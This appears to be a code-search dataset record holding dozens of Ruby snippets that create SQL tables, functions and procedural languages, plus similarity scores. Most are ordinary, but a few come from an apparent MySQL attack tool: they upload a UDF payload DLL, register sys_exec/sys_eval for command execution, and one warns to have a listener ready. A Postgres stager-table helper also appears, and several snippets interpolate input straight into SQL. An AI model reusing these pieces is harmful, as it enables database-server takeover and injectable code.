"def create_custom_function\n # puts \"Creating a custom function to make queries with timestamp as a string...\".cyan\n @session.execute('CREATE OR REPLACE FUNCTION timefstring(somearg text)\n RETURNS NULL ON NULL INPUT\n RETURNS timestamp\n LANGUAGE java\n AS $$\n java.text.SimpleDateFormat formatter = new java.text.SimpleDateFormat(\"yyyy-MM-dd HH:mm:ss.SSS\");\n try {\n Date date = formatter.parse(somearg);\n return date;\n } catch(java.text.ParseException e) {\n return new Date();\n }\n $$')\n end",
"def create_database(name)\n end",
"def functions\n pg_major = ::PgSaurus::Engine.pg_server_version[0]\n res = select_all <<-SQL\n SELECT n.nspname AS \"Schema\",\n p.proname AS \"Name\",\n pg_catalog.pg_get_function_result(p.oid) AS \"Returning\",\n CASE\n WHEN #{pg_major >= 11 ? \"p.prokind = 'w'\" : \"p.proiswindow\"} THEN 'window'\n WHEN p.prorettype = 'pg_catalog.trigger'::pg_catalog.regtype THEN 'trigger'\n ELSE 'normal'\n END AS \"Type\",\n p.oid AS \"Oid\"\n FROM pg_catalog.pg_proc p\n LEFT JOIN pg_catalog.pg_namespace n ON n.oid = p.pronamespace\n WHERE pg_catalog.pg_function_is_visible(p.oid)\n AND n.nspname <> 'pg_catalog'\n AND n.nspname <> 'information_schema'\n AND #{pg_major >= 11 ? \"p.prokind <> 'a'\" : \"p.proisagg <> TRUE\"}\n ORDER BY 1, 2, 3, 4;\n SQL\n res.inject([]) do |buffer, row|\n returning = row['Returning']\n function_type = row['Type']\n oid = row['Oid']\n\n function_str = select_value(\"SELECT pg_get_functiondef(#{oid});\")\n\n name = parse_function_name(function_str)\n language = parse_function_language(function_str)\n definition = parse_function_definition(function_str)\n volatility = parse_function_volatility(function_str)\n\n if definition\n buffer << ::PgSaurus::ConnectionAdapters::FunctionDefinition.new(name,\n returning,\n definition.strip,\n function_type,\n language,\n oid,\n volatility)\n end\n buffer\n end\n end",
"def create_table(table_name)\n # translate into pinyin, then to symbol\n table = trans_pinyin(table_name).to_sym\n DB.create_table table do\n primary_key :id\n String :mid, :unique=>true\n DateTime :created_timestamp\n String :content, :text => true\n String :source\n String :user_id\n String :user_name\n String :user_gender\n Integer :user_status_count\n Integer :user_fansNum\n end\n return table\nend",
"def create_genre(db)\r\n create_genre_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS genre(\r\n genre_id INTEGER PRIMARY KEY,\r\n genre_name VARCHAR(255)\r\n )\r\n SQL\r\n #create table genre\r\n db.execute(create_genre_cmd)\r\nend",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_book_condition(db)\r\n create_book_condition_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_condition(\r\n condition_id INTEGER PRIMARY KEY,\r\n condition_desc text(20)\r\n )\r\n SQL\r\n #create book_condition table\r\n db.execute(create_book_condition_cmd)\r\nend",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def irregular_function_sql(f)\n \"#{f.f}(#{literal(f.arg1)} #{f.joiner} #{literal(f.arg2)})\"\n end",
"def create_database_sql(name, opts = {})\n \"CREATE DATABASE #{quote_identifier(name)}\"\n end",
"def create_database\n system \"createdb #{@base_name}\"\n system \"psql -d #{@base_name} -c 'CREATE EXTENSION postgis;'\"\n end",
"def create_type_of_book(db)\r\n create_type_of_book_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS type_of_book(\r\n type_id INTEGER PRIMARY KEY,\r\n type_name VARCHAR(255)\r\n )\r\n SQL\r\n #create type_of_book table\r\n db.execute(create_type_of_book_cmd)\r\nend",
"def signature\n @signature ||= ::Amalgalite::SQLite3::Database::Function.signature( self.name, self.arity )\n end",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def createFunction(code:, name:, isDeterministic: nil) # TESTED\n body = {\n \"code\" => code,\n \"name\" => name,\n \"isDeterministic\" => isDeterministic\n }.delete_if{|k,v| v.nil?}\n request = @@request.merge({ :body => body.to_json })\n result = self.class.post(\"/_db/#{@database}/_api/aqlfunction\", request)\n self.class.return_result result: result\n end",
"def create\n\t\tsql = \"CREATE TABLE `#{@table}` (\"\n\t\t@columns.each do |column|\n\t\t\tsql += \"`#{column[:name]}` #{column[:type]}\"\n\t\t\tif(column[:not_null])\n\t\t\t\tsql += ' NOT NULL'\n\t\t\tend\n\n\t\t\tif(column[:primary_key])\n\t\t\t\tsql += ' PRIMARY KEY'\n\t\t\tend\n\n\t\t\tif(column[:auto_increment])\n\t\t\t\tsql += ' AUTOINCREMENT'\n\t\t\tend\n\n\t\t\tif(column[:unique])\n\t\t\t\tsql += ' UNIQUE'\n\t\t\tend\n\t\t\tsql += ','\n\t\tend\n\t\tsql.chop! # Remove trailing ','\n\t\tsql += ');'\n\t\tp sql\n\t\t@db.execute(sql)\n\tend",
"def create_authors(db)\r\n create_authors_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS authors(\r\n author_id INTEGER PRIMARY KEY,\r\n author_name VARCHAR(255)\r\n )\r\n SQL\r\n #create authors table\r\n db.execute(create_authors_cmd)\r\nend",
"def create_trigger(table, name, function, opts=OPTS)\n self << create_trigger_sql(table, name, function, opts)\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def calculate_function(function)\n raise \"invalid function '#{function}'\" unless [:sum, :avg, :min, :max, :count].include?(function.to_sym)\n Sequel::SQL::Function.new(function.to_sym, :value)\n end",
"def table_name; \"gdo_module\"; end",
"def create\n puts \"Creating tumblr\"\n ActiveRecord::Base.connection.execute(File.open(\"db/schema.sql\").read)\n end",
"def oracle; end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def create_schema_sql(name, opts=OPTS)\n \"CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{\" AUTHORIZATION #{literal(opts[:owner])}\" if opts[:owner]}\"\n end",
"def create\n database.command({ :create => name }.merge(options))\n end",
"def create_table!\n return true unless Fathom.config.uses_sqlite_optimizer\n value = Fathom.config.db.execute(table_creation_sql)\n end",
"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def create_fund_table\n Bsf::Scraper.db.create_fund_table\n end",
"def update_function(name, options = {})\n version = options[:version]\n sql_definition = options[:sql_definition]\n\n if version.nil? && sql_definition.nil?\n raise(\n ArgumentError,\n \"version or sql_definition must be specified\"\n )\n end\n\n sql_definition = sql_definition.strip_heredoc if sql_definition\n sql_definition ||= Fx::Definition.function(name: name, version: version).to_sql\n\n Fx.database.update_function(name, sql_definition)\n end",
"def [](*args)\n Sequel::SQL::Function.new(self, *args)\n end",
"def create_table_sql(name, generator, options)\n \"#{super}#{create_table_suffix_sql(name, options)}\"\n end",
"def create(product, price, description, quantity)\n\t@conn.exec(\"INSERT INTO amazone (product, price, description, quantity) VALUES ('#{product}', '#{price}', '#{description}', '#{quantity}');\")\n\tputs \"I added your product to the table.\"\nend",
"def create_book_readers(db)\r\n create_book_readers_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_readers(\r\n reader_id INTEGER PRIMARY KEY,\r\n reader_name VARCHAR(255)\r\n )\r\n SQL\r\n #create the table\r\n db.execute(create_book_readers_cmd)\r\nend",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n# execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def make_statement\n end",
"def make_statement\n end",
"def new_test(test_name)\n\tdb.execute(\"CREATE TABLE IF NOT EXISTS #{test_name} (id INTEGER PRIMARY KEY,\n student_first VARCHAR(255),\n student_last VARCHAR(255),\n grade INT\n );\")\nend",
"def create_schema(name)\n sql = %{CREATE SCHEMA \"#{name}\"}\n ActiveRecord::Base.connection.execute sql\n end",
"def create_movies_table\n c = connect\n # this is another way to write a string, using %q{}\n c.exec %q{ \n CREATE TABLE movies (\n id SERIAL PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def create_database(connection_string, db_name)\n create_sql = <<-SQL\n CREATE DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{create_sql}\\\"\"\nend",
"def show_create_table(db, table)\n end",
"def create_function( db, name, args, text, cookie, func, step, final )\n if func || ( step && final )\n cb = CallbackData.new\n cb.proc = cb.proc2 = nil\n cb.data = cookie\n end\n\n if func\n cb.proc = func\n step = final = nil\n elsif step && final\n cb.proc = step\n cb.proc2 = final\n\n func = nil\n end\n\n result = CSSQLite.sqlite3_create_function( db, name, args, text, cb, func, step, final )\n\n # see comments in busy_handler\n if cb\n @callback_data[ name ] = cb\n else\n @callback_data.delete( name )\n end\n\n return result\n end",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def create_regimen(db, name, age, vitamin)\n db.execute(\"INSERT INTO regimen (name, age, vitamin) VALUES (?, ?, ?)\", [name, age, vitamin])\nend",
"def create_functions\n @ddl[:aggregate].each_with_index do |agg, _i|\n output = agg[:args][0]\n\n if contains_output?(output)\n arguments = agg[:args][1]\n format = (arguments.delete(:format) if arguments) || nil\n begin\n @functions << load_function(agg[:function]).new(output, arguments, format, @action)\n rescue Exception => e # rubocop:disable Lint/RescueException\n Log.error(\"Cannot create aggregate function '%s': %s\" % [output, e])\n @failed << {:name => output, :type => :startup}\n end\n else\n Log.error(\"Cannot create aggregate function '%s'. '%s' has not been specified as a valid ddl output.\" % [output, output])\n @failed << {:name => output, :type => :create}\n end\n end\n end",
"def drop_function(function_name, params, options = {})\n SchemaMonkey::Middleware::Migration::CreateFunction.start(connection: self, function_name: function_name, params: params, options: options) do |env|\n function_name = env.function_name\n params = env.params\n options = env.options\n function_type = (options[:function_type] || :function).to_s.upcase\n\n sql = \"DROP #{function_type}\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{function_name}(#{params})\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def sql\n @stmt_api.sql\n end",
"def info_sql\n \"#{INFO_SQL} AND pg_catalog.pg_get_function_arguments(p.oid) = '#{to_s}'\"\n end",
"def sql(options={})\n get_location\n # TODO: validate options\n @params[:sql] = FEATURE_DEFAULTS[:sql].merge(options)\n @params[:sql][:generate] = true\n end",
"def create_db_cmd!\n \"createdb -e #{new_db_name}\"\n end",
"def create_customer(db, first, last, address, city, phone)\n db.execute(\"INSERT INTO customers (first_name, last_name, address, city, phone) VALUES (?, ?, ?, ?, ?)\", [first, last, address, city, phone])\nend",
"def add_to (table_name,title,code)\r\n\t\"INSERT INTO \" + table_name + \r\n\t\"(title,code) VALUES \r\n\t('\" + title + \"','\" + code + \"')\"\r\nend",
"def create(tablename)\n #allow us to pass either a single symbol or an array of symbols.\n if Symbol === tablename\n tablename = [tablename]\n end\n\n tablename.each do |table|\n #standard creation protocol.\n $BS.create table\n\n #here is the reflective magic. Defined below in this list is this thingy.\n $BS.connect {|db| eval \"data_#{table} db\"}\n end\n\n $BS\nend",
"def create!(con)\n con.exec create_stmt\n end",
"def create_book_owners(db)\r\n create_book_owners_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_owners(\r\n owner_id INTEGER PRIMARY KEY,\r\n owner_name VARCHAR(255)\r\n )\r\n SQL\r\n #create book_owners table \r\n db.execute(create_book_owners_cmd)\r\nend",
"def create_database(name, _options = {})\n execute(\"CREATE SCHEMA `#{name}`\")\n end",
"def create_function( name, arity, type=nil, &block ) # :yields: func, *args\n case type\n when :numeric\n type = SQLite::API::NUMERIC\n when :text\n type = SQLite::API::TEXT\n when :args\n type = SQLite::API::ARGS\n end\n\n callback = proc do |func,*args|\n block.call( FunctionProxy.new( func ), *args )\n end\n\n SQLite::API.create_function( @handle, name, arity, callback )\n SQLite::API.function_type( @handle, name, type ) if type\n\n self\n end",
"def create_database\n $conn.exec(\"\"\"\n CREATE TABLE users (\n id SERIAL NOT NULL,\n name varchar(255) NOT NULL,\n created_at timestamp NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE UNIQUE INDEX user_names ON users (name);\n CREATE TABLE blathers (\n id SERIAL NOT NULL,\n text varchar(141) NOT NULL,\n created_at timestamp NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE TABLE blathers_mentioned_users (\n blather_id integer NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (blather_id, user_id)\n );\n \"\"\")\nend",
"def createProjectTable\n @Handle.execute( @ProjectSchema ) \n end",
"def create_function(function_name, returning, definition, options = {})\n\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{table_name.inspect} for selector #{selector_keys.map(&:inspect).join(', ')} and setter #{setter_keys.map(&:inspect).join(', ')}\"\n\n selector_column_definitions = column_definitions.select { |cd| selector_keys.include?(cd.name) }\n setter_column_definitions = column_definitions.select { |cd| setter_keys.include?(cd.name) }\n update_column_definitions = setter_column_definitions.select { |cd| cd.name !~ CREATED_COL_REGEX && !options[\"ignore_on_update\"].include?(cd.name) }\n\n first_try = true\n connection.execute(%{\n CREATE OR REPLACE FUNCTION #{name}(#{(selector_column_definitions.map(&:to_selector_arg) + setter_column_definitions.map(&:to_setter_arg)).join(', ')}) RETURNS VOID AS\n $$\n DECLARE\n first_try INTEGER := 1;\n BEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{update_column_definitions.map(&:to_setter).join(', ')}\n WHERE #{selector_column_definitions.map(&:to_selector).join(' AND ') };\n IF found THEN\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{setter_column_definitions.map(&:quoted_name).join(', ')}) VALUES (#{setter_column_definitions.map(&:to_setter_value).join(', ')});\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- seamusabshere 9/20/12 only retry once\n IF (first_try = 1) THEN\n first_try := 0;\n ELSE\n RETURN;\n END IF;\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\n END;\n $$\n LANGUAGE plpgsql;\n })\n rescue\n if first_try and $!.message =~ /tuple concurrently updated/\n first_try = false\n retry\n else\n raise $!\n end\n end",
"def update_function(name, args)\n version = args[:version]\n sql_definition = args[:sql_definition]\n revert_to_version = args[:revert_to_version]\n\n if version.nil? && sql_definition.nil?\n raise(\n ArgumentError,\n \"version or sql_definition must be specified\",\n )\n end\n\n sql_definition = sql_definition.strip_heredoc if sql_definition\n sql_definition ||= Fx::Definition.new(\n name: name,\n version: version,\n ).to_sql\n\n Fx.database.update_function(name, sql_definition)\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def create_custom_function(dbc, file)\n dll_name = randz(15) + \".dll\"\n plugin_path = get_plugin_dir(dbc)\n @udf_dest = plugin_path.chomp + dll_name\n fake_function = 'sys_' + randz(5)\n\n # Upload our UDF DLL Payload file\n if write_bin_file(dbc, file, @udf_dest)\n begin\n puts \"Payload DLL writen to disk\".light_green + \"!\".white\n puts \"Creating function to trigger now\".light_blue + \"....\".white\n puts \"Make sure your listener is ready\".light_yellow + \"....\".white\n sleep(3)\n # Drop function if its already there, then create new\n q = dbc.query(\"DROP FUNCTION IF EXISTS #{fake_function};\")\n q = dbc.query(\"CREATE FUNCTION #{fake_function} RETURNS string SONAME '#{dll_name}';\")\n return fake_function\n rescue Mysql::Error => e\n puts \"Error Triggered, Payload should have also been triggered\".light_green + \"!\".white\n return fake_function\n end\n end\nend",
"def createUserTable\n @Handle.execute( @UserSchema ) \n end",
"def generate(table_name, statement)\n alter_argument = AlterArgument.new(statement)\n dsn = DSN.new(connection_details.database, table_name)\n\n \"#{command} #{all_options} #{dsn} #{alter_argument}\"\n end",
"def create_schema(name, opts=OPTS)\n self << create_schema_sql(name, opts)\n end",
"def create_sys_functions(dbc)\n udf_name = randz(15) + \".dll\"\n plugin_path = get_plugin_dir(dbc)\n @udf_dest = plugin_path.chomp + udf_name\n if @build == 'x64'\n file = './payloads/64/lib_mysqludf_sys.dll'\n elsif @build == 'x32'\n file = './payloads/32/lib_mysqludf_sys.dll'\n end\n\n # Upload our UDF DLL Payload file\n if write_bin_file(dbc, file, @udf_dest)\n begin\n # Drop function if its already there, then create new\n q = dbc.query(\"DROP FUNCTION IF EXISTS sys_exec;\")\n q = dbc.query(\"CREATE FUNCTION sys_exec RETURNS int SONAME '#{udf_name}';\")\n q = dbc.query(\"CREATE FUNCTION sys_eval RETURNS string SONAME '#{udf_name}';\")\n\n # Confirm it was added and all is well....\n if sys_exec_check(dbc)\n return true\n else\n return false\n end\n rescue Mysql::Error => e\n puts \"Problem creating UDF SYS functions\".light_red + \"!\".white\n puts \"\\t=> \".white + \"#{e}\\n\\n\".light_red\n return false\n end\n end\nend",
"def create_recipe(db,name,description,length,difficulty)\n q = \"INSERT INTO recipes (name,description,length,difficulty) VALUES ('#{name}','#{description}',#{length},#{difficulty});\"\n return db.execute(q)\nend",
"def execute sql\n db[sql]\n end",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def add_trigger_and_function(filename, trigger_tables, drop_function=false)\n build_query filename, 'triggers' do |seed, queries|\n queries[0] << %Q!BEGIN;\n CREATE OR REPLACE FUNCTION #{seed['name']}() RETURNS #{seed['function']['return']} AS $$\n BEGIN\n #{seed['function']['sql']}\n END;\n $$ LANGUAGE plpgsql;\n #{Array(trigger_tables).map do |table|\n \"CREATE TRIGGER #{seed['name']} #{seed['trigger']['event'].gsub('<TRIGGERTABLE>', table)} #{seed['trigger']['execute']} #{seed['name']}();\"\n end.join(\"\\n\")}\n COMMIT;!\n queries[1] << Array(trigger_tables).map { |table| \"DROP TRIGGER IF EXISTS #{seed['name']} ON #{table};\\n\" } << (drop_function ? \"DROP FUNCTION IF EXISTS #{seed['name']};\" : '')\n end\n end",
"def create_user(db, first_name, last_name)\n db.execute(\"INSERT INTO users (first_name, last_name) VALUES (?, ?)\", [first_name, last_name])\nend",
"def createTable\n\t\tstm = @db.prepare \"CREATE TABLE IF NOT EXISTS leituras (\n\t\t\t\tIDCLIENTE INT NOT NULL,\n\t\t\t\tIDSENSOR INT NOT NULL,\n\t\t\t\tVALUE INT NOT NULL,\n\t\t\t\tGPSX INT NOT NULL,\n\t\t\t\tGPSY INT NOT NULL,\n\t\t\t\tTIMESTAMP TEXT NOT NULL\n\t\t\t);\"\n\n\t\trs = stm.execute\n\t\trs.close\n\tend",
"def create_sys_functions\n udf_name = randz(15) + \".dll\"\n plugin_path = get_plugin_dir\n udf_dest = plugin_path.chomp + udf_name\n if @build == 'x64'\n file = \"#{HOME}extras/myudf/payloads/64/lib_mysqludf_sys.dll\"\n elsif @build == 'x32'\n file = \"#{HOME}extras/myudf/payloads/32/lib_mysqludf_sys.dll\"\n end\n\n # Upload our UDF DLL Payload file\n if udf_write_bin_file(file, udf_dest)\n begin\n # Drop function if its already there, then create new\n q = @db_connection.query(\"DROP FUNCTION IF EXISTS sys_exec;\")\n q = @db_connection.query(\"CREATE FUNCTION sys_exec RETURNS int SONAME '#{udf_name}';\")\n q = @db_connection.query(\"CREATE FUNCTION sys_eval RETURNS string SONAME '#{udf_name}';\")\n\n # Confirm it was added and all is well....\n if sys_exec_check\n return udf_dest\n else\n return nil\n end\n rescue Mysql::Error => e\n print_error(\"Problem creating UDF SYS functions!\")\n puts \"\\t=> \".white + \"#{e}\\n\\n\".light_red\n return nil\n end\n end\n end",
"def executeNoArgs\n db =Rho::Database.new(Rho::Application.databaseFilePath('local'), \"local\");\n \n tableName = Library.getRandomName\n puts \"Table Name #{tableName}\"\n \n db.executeSql(\"CREATE TABLE #{tableName}(x INTEGER, y TEXT)\") \n data = db.isTableExist(tableName)\n \n puts \"#{data}\"\n data\nend",
"def db; end",
"def db; end",
"def create_queries\n gen_rulename\n [\"\n -- FN for sync updates \n CREATE FUNCTION fn_#{suffix}()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n UPDATE #{dest_table}\n SET #{ cols.map{|src, dest| \"\\\"#{dest}\\\" = NEW.\\\"#{src}\\\"\" }.join(', ') }\n WHERE \\\"#{map_dest}\\\" = NEW.\\\"#{map_src}\\\";\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for sync updates\n CREATE TRIGGER tr_#{suffix}\n AFTER INSERT OR UPDATE ON #{src_table} \n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}();\",\n \"\n -- FN for cleaner\n CREATE FUNCTION fn_#{suffix}_cleaner()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n IF OLD.sid = #{sid_src} OR OLD.sid = #{sid_dest} THEN\n #{delete_queries.join(' ')}\n END IF;\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for cleaner\n CREATE TRIGGER tr_#{suffix}_cleaner\n AFTER DELETE ON #{surveys_table}\n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}_cleaner();\n \"]\n end",
"def create_business(database, name, industry)\n database.execute(\"INSERT INTO businesses (name, industry) VALUES (?, ?)\", [name, industry])\nend",
"def create_employee(database, first_name, last_name, wage, title, last_four_ssn, business_id)\n database.execute(\"INSERT INTO employees (first_name, last_name, wage, title, last_four_ssn, business_id) VALUES (?, ?, ?, ?, ?, ?)\", [first_name, last_name, wage, title, last_four_ssn, business_id])\nend",
"def create_schema schema_name\n execute \"CREATE SCHEMA #{quote_schema_name(schema_name)}\"\n end",
"def create_entry()\n\tdb.execute( \"INSERT INTO test (name, codename) VALUES (?, ?)\", [name, code_name])\n\nend",
"def postgres_create_stager_table\n tbl = Rex::Text.rand_text_alpha(8).downcase\n fld = Rex::Text.rand_text_alpha(8).downcase\n resp = postgres_query(\"create temporary table #{tbl}(#{fld} text)\")\n if resp[:sql_error]\n print_error resp[:sql_error]\n return false\n end\n return [tbl,fld]\n end",
"def add_family(db, name, age)\r\n\tdb.execute(\"INSERT INTO family (name, age) VALUES (?, ?)\", [name, age])\r\nend",
"def new_student (db, name)\n db.execute(\"INSERT INTO student (name) VALUES (?)\", [name])\nend"
] |
[
"0.73484826",
"0.72461474",
"0.72118765",
"0.7096132",
"0.7025482",
"0.6792593",
"0.64558375",
"0.64074355",
"0.6336611",
"0.63190633",
"0.63179994",
"0.6292024",
"0.6202775",
"0.6190527",
"0.61772263",
"0.61308116",
"0.61014944",
"0.6098711",
"0.6088275",
"0.60713166",
"0.60658413",
"0.60509354",
"0.6040112",
"0.6032452",
"0.60302055",
"0.6025913",
"0.599051",
"0.5943064",
"0.5941858",
"0.593028",
"0.5913495",
"0.5872233",
"0.58690614",
"0.5856243",
"0.5851911",
"0.58443487",
"0.584115",
"0.58324784",
"0.58290017",
"0.5823967",
"0.5821156",
"0.581835",
"0.5813372",
"0.5780447",
"0.5777676",
"0.57604074",
"0.5759884",
"0.57372344",
"0.5736603",
"0.5736603",
"0.5732197",
"0.57306",
"0.57243127",
"0.5717095",
"0.5713703",
"0.5712523",
"0.5711732",
"0.5702915",
"0.5697723",
"0.5680729",
"0.56796736",
"0.5676696",
"0.5668158",
"0.5652897",
"0.564514",
"0.5644247",
"0.5634602",
"0.562681",
"0.5626504",
"0.56260633",
"0.5622029",
"0.56190366",
"0.5616368",
"0.561008",
"0.5602867",
"0.5591632",
"0.5589319",
"0.55805993",
"0.5578557",
"0.5576696",
"0.55592114",
"0.555134",
"0.5548442",
"0.55452037",
"0.55298215",
"0.5523163",
"0.5514714",
"0.55143356",
"0.55087924",
"0.55039406",
"0.54987895",
"0.54987895",
"0.54927975",
"0.5486008",
"0.5477251",
"0.5472938",
"0.5457337",
"0.5456962",
"0.54535854",
"0.5450306"
] |
0.7258271
|
1
|
SQL for creating a procedural language.
|
def create_language_sql(name, opts=OPTS)
"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{" HANDLER #{opts[:handler]}" if opts[:handler]}#{" VALIDATOR #{opts[:validator]}" if opts[:validator]}"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_language(name, opts=OPTS)\n self << create_language_sql(name, opts)\n end",
"def make_statement\n end",
"def make_statement\n end",
"def sql\n @parser.sql\n end",
"def sql\n @parser.sql\n end",
"def add_code(cheatsheet_db, language, type, code, comment)\n cheatsheet_db.execute(\"INSERT INTO #{language} (type, code, comment) VALUES (?, ?, ?)\", [type, code, comment])\nend",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def to_pg_query(query, language)\n pg_syntax = query.gsub(/\\W+/, \" | \").gsub(/ \\| and \\| /, \" & \").gsub(/ \\| or \\| /, \" | \").gsub(/ \\| not \\| /, \" | !\")\n sanitize_sql_array [\"to_tsquery('#{language}', ?)\", pg_syntax]\n end",
"def sql! sql=nil\n require 'niceql'\n puts Niceql::Prettifier.prettify_sql sql || $last_sql_command\n end",
"def sql(options={})\n get_location\n # TODO: validate options\n @params[:sql] = FEATURE_DEFAULTS[:sql].merge(options)\n @params[:sql][:generate] = true\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n# execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def sql\n @context.sql\n end",
"def sql sql\n @master.puts \"#{sql};\"\n end",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def statement; end",
"def sql\n @stmt_api.sql\n end",
"def create_movies_table\n c = connect\n # this is another way to write a string, using %q{}\n c.exec %q{ \n CREATE TABLE movies (\n id SERIAL PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def drop_language_sql(name, opts=OPTS)\n \"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}\"\n end",
"def source_sql\n system \"psql -d #{@base_name} -f #{@sql_path}\"\n end",
